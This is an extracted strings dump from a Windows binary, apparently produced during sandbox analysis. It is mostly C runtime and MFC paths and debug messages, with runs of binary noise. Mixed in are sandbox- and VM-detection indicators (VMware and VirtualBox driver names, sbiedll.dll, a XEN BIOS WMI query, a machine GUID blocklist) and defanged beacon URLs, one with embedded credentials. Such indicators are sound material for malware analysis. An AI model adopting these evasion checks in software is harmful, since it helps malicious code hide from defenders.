f:\dd\vctools\crt_bld\self_x86\crt\src\printf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stat64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\rewind.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.h

("Corrupted pointer passed to _freea", 0)

f:\dd\vctools\crt_bld\self_x86\crt\src\fprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\atof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wtof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsdup.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

W_CrtSetReportHook2

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szExeName, 260, "<program name unknown>")

__crtMessageWindowA

f:\dd\vctools\crt_bld\self_x86\crt\src\fullpath.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fdopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\feoferr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputws.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgets.c

f:\dd\vctools\crt_bld\self_x86\crt\src\clearerr.c

fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0

_CrtSetReportMode

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

nRptType >= 0 && nRptType < _CRT_ERRCNT

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportA

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportW

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

f:\dd\vctools\crt_bld\self_x86\crt\src\fputwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtod.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

KERNEL32.DLL

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), rterrs[tblindx].rterrtxt)

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "\n\n")

strcpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "Runtime Error!\n\nProgram: ")

_NMSG_WRITE

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

WUSER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dtoxtm64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\getcwd.c

strcpy_s(resultstr, resultsize, autofos.man)

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

$f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

("CRT Logic error during setenv",0)

__crtsetenv

c:\%original file name%.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

%original file name%.exe_908_rwx_00401000_001C5000:

FV<.tN<[tJ<\tF<*tB<|t><^t:<$t6

PSSSSSSh

J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ<=JJJJJJJJJJJ>?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlexcept.h

HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0

kernel32.dll

%System%\drivers\vmmouse.sys

%System%\drivers\vmhgfs.sys

%System%\drivers\VBoxMouse.sys

sbiedll.dll

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xdebug

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\streambuf

SELECT * FROM Win32_BIOS WHERE Manufacturer LIKE '%XEN%')

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\cstringt.h

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocale

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xiosbase

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Classes\ProcMon.Logfile.1\shell\open\command

IsWindowsServer

hXXps://ssl.google-analytics.com/collect?

KNQSSSSST^chiny" /;;HJXZhju&,8>LPTX[aahuy LLTZdq{|*5@CCFO]dpp{||'*/==@ANY``dntx%(48>GRRV[bgpu!/>EIQQ\\

GLNPPPPP\`apz 5;?AIV]jsvz#1=DHPQ]cfr} #&,148::CP]cp|$-7EJTVanz}'')2;>HU[

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocnum

O^dgggggp!)19DFPZelss|""#01>AHPS^ky*5<KXfgvx!/>@FPVZZix -/8>MY[ghv}#'6CEIMXZep!/5CKX]ams ( 6APXabn{}$167?@COO\ivv}""*0=EHRT_ix(3@M[[hhu(CRUZ]hvyy(7ES[^giltx| /:BIJOY^

AKRVVVVVdnt%&(0=LWafqy%' 22<GVbdgmx{,033=KXgnuvx"/=BFP[adix$LCPWYZ`ddq

KNQSSSSSSZ[effhoy%-<GV`gt|4COOW]`ms|!08=ALPS]hsx!08GOWcq"/;=KXdqxz$(07

EHKOOOOOP\^`mp}$09@FSZfqx",78GO^iilsv#).8;GR^bdl{%*466;GTW[aghtx)8?APTchst%6CGV[imppu",49FS^ejjy|,17BQ

FUY\\\\\]cmmnuwy&'/3@AAHWegsuy|-0=GO[eoy{!$2:GJVdkmvv#-899DDIIIXXbcq}$.2

CRVeeeeert$$'-/7:<AIUajjtz)/6:@OTcps|=>LNVelv$16:EIX_ehq!!"1@AIVclquz|} ./455DFUYZgq|%(3@ANY]`bjlnn|}}'28=FMYcllt""'38EFMXZ\`cjs#(/6=DJTao} .6BJNTWcpq **0??GIX_bhiot

ENSUUUUUVYenrtz :IJW[hlp}4CGS\ehtvw(--8FIRZao{ ..3AO\fgnz}),/17DDDHHQ\

O]`iiiiis$,77>MXaemz(-9>FQYccrtz'.=HVX`lw"/=>JY]ggqw $'*3>LZ[gn{#$ 29FFU

KNOUUUUU`krz{&-0677ENT_ap|&( 5CRTXYcnu{{

AEKOOOOOUdpr !#.6AJVeejs .36DGP\_gpq| .18FJLM[dop{})89<IR_mpp{*7@NSXZfgh

EHKOOOOOUdpv{%)-:@AOV^adn}*379ELMZhrs"-00>BJS[eor|&&,;FTY`eju}.<KZhmvz*0

GVZcccccotxx &02APQUdpqx||&)2258@COVbety

GSWdddddjr /;GJJYY[dfjqz{} 2=EHQX]fhknou$/4?EHU\]fqz|%)5BLZ^`lz"HDQ[gsv /3ANSSYeet}%')3>?KKMQQU\dhrrz%,8GOS_iu{(1?EKN[hppr{"%-159<>IMQ

JRV[[[[[eehs"&/9;>>DDKTalx	CJR\bcopv&3

()$^.* ?[]|\-{},:=!

HKO\\\\\jv!0;FGS\kz)57EKQ\jsx(.8=GSUdp|}"*46::DR[ggqz$'-;ERRV]]klw!/;JR]

INSTTTTT^``acgs$34?DGLW_esx!%LEPXgor|}

IUVVVVVV`efpv{{|"(*-38BJSajoxz}#(-22:IW`

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\locale

MNUWWWWWalt!,9CMYajy"1<>ER\jpyy %IDHR`elwx'-6ENS\apqq{"&/6EHPR]it!&,3>

invalid _N_type: %d

DRSYYYYYbm|#%,/;GMW^cknrs!%,;HOTbgt|*.1?DLNQX^^lrw7FHO^hmv )3=DKPTV]bg

N\`aaaaaoqtv!FT]bbp})26>ES\beju &,.7?

BKNRRRRRX^aop "))7>EKS`gixz&1::?FS\appw8DKZeps$&&5@MRR^dntx%((78;;FMOT

JUUXXXXXZdqss},0<DIM\cmn|'0;EKZ_gu9DP

HKLPPPPP^jqvCGR[hs| $'*67;BMV[\gr{,48

DDGNNNNNY]gox}78EO[fmy|}&3BEKPVXdnx')*57@FKTY_ahhjmsuLCEQYhox .6@DE

COPRRRRRRSVX[anq""#% 1@ENQXXelsy!-<CPYYhkqz%/005ANSSY\ann|( :DSTcpr{#&5A

CQQZZZZZ^fjps#,7DMT[gnpqv||)47?LW^mw#)2;;;FLU^bgnq})*4@JWWY_iot} :;GS`ksv%FU\fr!/9FNTYZ_gq}%.3@ACLMZhmx(3;FUU]^mu!  -28BNRS]biiqq #,4AHTTbjs ,-.<JS^mw}.<BEKTZis#/8==?EMWYZggs#*2=>JMY`cfhuz"==CKO\alloz*5;EL[gt|'4BEFS]]hoz'5;>IKW

M\_cccccin}))8DFU_jpz (-8;=@KWcfjpqt{&(56:FS[bekwz /<<CGNUdpuv&*9:<CQTXftx=JPZhirz&4?LNPUZgju|$0=FR_l

HQUdddddnqq{' 8@O^km|)35:@GTcp|}#-7?KKVZ

NVX[[[[[^ddqx&&*-;JMV_cmq!"-4BPZfhhlry}!%&-8AGISU[cklqyy}}"-14:CNS[^ijqv

HHM\\\\\dp}))38DKPYZ`hw#(4:GKPUW`bchs|DM[`ejv ,:>?GNWacos#$16EGR\]_eq{!(358@ACEPZ]ces} & 05?MZ]ceppx(*59=CO[`lx{*7>BBL[es!&'-7CQR^dlru|&/;BBQ]dgvD6?JLZ_jy(-6BMMN\e

OVYbbbbbghmt|!0<HSTaipwx)*249AGQT[bdfq CDERZdkzz')59=BHR[ir#128FGU]_d

LOVXXXXXds ''/>CRTU[bnw#1@MU_htx%CMNZelvx(6AAIJMY[]hw}"$' 9>BDOT]lo{}

LNOOOOOOYbjpv%1;GSVXan}")3;?BGQZ^lqt -7FPWep}%%-2<ER[[_dmn|' 1>>>L[cllz

NetBase.cpp

LSXaaaaaekxx$'08?NZho}.5>MY]cnq}*1;BBKS`cfhw!-9DSZcjnw( 38CRR^akw&'*.:;DJR\^gjrryyy()5AM[emqrt$2689@JT]hlrsu$057::BCCRT]_gmu|&0;BQ^inryy

URL EMPTY

"url":"

ParseUrl

/Setup.application

hXXp://

PictureEx.cpp

c:\logFile.txt

hXXp://42e546f0ea2d40afa114ea020951ec9d:9538ea5acbbe4fc6b42811c415685653@

.cpp" ,

errormsg

Error opening key.

Key not found.

CheckRegistryKeyExistance

_virtualGetStringKey

_virtualSetStringKey

_virtualSetDwordKey

_virtualcheckRegkKey

SetStringKey

inflate 1.1.3 Copyright 1995-1998 Mark Adler

CWebBrowser2

0.0.0.0

mb_00000000-0000-0000-0807-060504030201

mb_09F005AE-AC9D-4FC1-AB7A-24004F6C043A

mb_01010101-0101-0101-0101-010101010101

mb_58585858-5858-5858-5858-585858585858

mb_4c4c4544-0000-2010-8020-80c04f202020

mb_11111111-2222-3333-4444-555555555555

mb_11111111-1111-1111-1111-111111111111

mb_00020003-0004-0005-0006-000700080009

mb_890E2D14-CACD-45D1-AE66-BC80E8BFEB0F

mb_8E275844-178F-44A8-ACEB-A7D7E5178C63

mb_52309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_DC698397-FA54-4CF2-82C8-B1B5307A6A7F

mb_61F39712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_50FB9712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_93309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_56F49712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_07090201-0103-0301-0807-060504030201

mb_03000200-0400-0500-0006-000700080009

mb_FEFEFEFE-FEFE-FEFE-FEFE-FEFEFEFEFEFE

mb_FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_00000000-0000-0000-0000-000000000000

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp

m_nMsgLast =

m_msgCur = {

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp

IGNORING command id 0xX sent to %hs dialog.

Routing command id 0xX to app.

Routing command id 0xX to owner window.

Warning: Creating dialog from within a COleControlModule application is not a supported scenario.

Warning: ExecuteDlgInit failed during dialog init.

ERROR: Dialog with IDD 0xX must have the child style.

ERROR: Dialog with IDD 0xX must be invisible.

ERROR: Cannot find dialog template with IDD 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp

Warning: unknown WM_MEASUREITEM for menu item 0xX.

hhctrl.ocx

Implementation Warning: control notification = $%X.

Warning: not executing disabled command %d

hWnd = $X (nIDC=$X) is not a %hs.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h

CCmdTarget

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp

SENDING control notification %d from control id 0xX to %hs window.

SENDING command id 0xX to %hs target.

No handler for command ID 0xX, disabling it.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp

Error: no data exchange control with ID 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp

m_ps.rcPaint =

m_ps.fErase =

m_ps.hdc =

lgpn.lopnColor =

lgpn.lopnWidth.x (width) =

lgpn.lopnStyle =

lb.lbColor =

lb.lbHatch =

lb.lbStyle =

lf.lfFaceName =

lf.lfPitchAndFamily =

lf.lfQuality =

lf.lfClipPrecision =

lf.lfOutPrecision =

lf.lfCharSet =

lf.lfStrikeOut =

lf.lfUnderline =

lf.lfItalic =

lf.lfWeight =

lf.lfOrientation =

lf.lfEscapement =

lf.lfWidth =

lf.lfHeight =

bm.bmBitsPixel =

bm.bmPlanes =

bm.bmWidthBytes =

bm.bmWidth =

bm.bmHeight =

bm.bmType =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

m_pszExeName =

m_nCmdShow =

m_lpCmdLine =

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Warning: no message line prompt for ID 0xX.

Warning: OnUpdateKeyIndicator - unknown indicator 0xX.

Warning: scroll bars in frame windows may cause unusual behaviour.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp

Error: failed to load message box prompt string 0xx.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp

IOleInPlaceObject not supported on OLE control (dialog ID %d).

Persistence not supported on OLE control %ls.

%d. Column ordinal %d: Binding as native data type

%d. Column ordinal %d: Binding a COM object

F%d. Column ordinal %d: Binding as an IStream object

%d. Column ordinal %d: Binding as an ISequentialStream object

neither ISequentialStream nor IStream are supported!

IStream is supported

FISequentialStream is supported

Testing streams support...

%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory

%d. Column ordinal %d: Binding length and status ONLY

Number of columns: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h

Unsupported DBTYPE (%d) in column %d

$@Column %d not bound

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp

CHttpConnection

CHttpFile

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\inet.cpp

Unknown status: %d

Internet ctxt=%d:

Warning: throwing CInternetException for error %d

Warning: Extended error reported with no response info

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp

WM_HOTKEY

WM_SETHOTKEY

WM_IDLEUPDATECMDUI

WM_DDE_EXECUTE

WM_KEYLAST

WM_SYSKEYUP

WM_SYSKEYDOWN

WM_KEYUP

WM_KEYDOWN

WM_VKEYTOITEM

WM_CTLCOLORMSGBOX

WM_USER 0xX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp

Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.

Warning: failed to reclaim %d bytes for memory safety pool.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp

Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp

Error: failed to load AfxFormatString string 0xx.

Error: illegal string index requested %d.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp

a %hs object at $%p, %u bytes long

an invalid object at $%p, %u bytes long

faulted while dumping object at $%p, %u bytes long

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp

m_bz.hTask =

m_bz.hResource =

m_bz.lpszTemplate =

m_bz.hInstance =

m_bz.lCustData =

m_bz.lpszCaption =

m_bz.hWndOwner =

m_bz.dwFlags =

m_bz.cbStruct =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\streambuf

f:\dd\vctools\crt_bld\self_x86\crt\src\xlocale

%s(%d) :

%s_%0x

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

Client hook allocation failure at file %hs line %d.

Memory allocated at %hs(%d).

Client hook re-allocation failure at file %hs line %d.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory after end of heap buffer.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to a heap buffer that was freed.

crt block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

%hs(%d) :

#File Error#(%d) :

Data: <%s> %s

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\threadex.c

_CrtDbgReport: String too long or IO Error

Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

%s(%d) : %s

_CrtDbgReport: String too long or Invalid characters in String

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

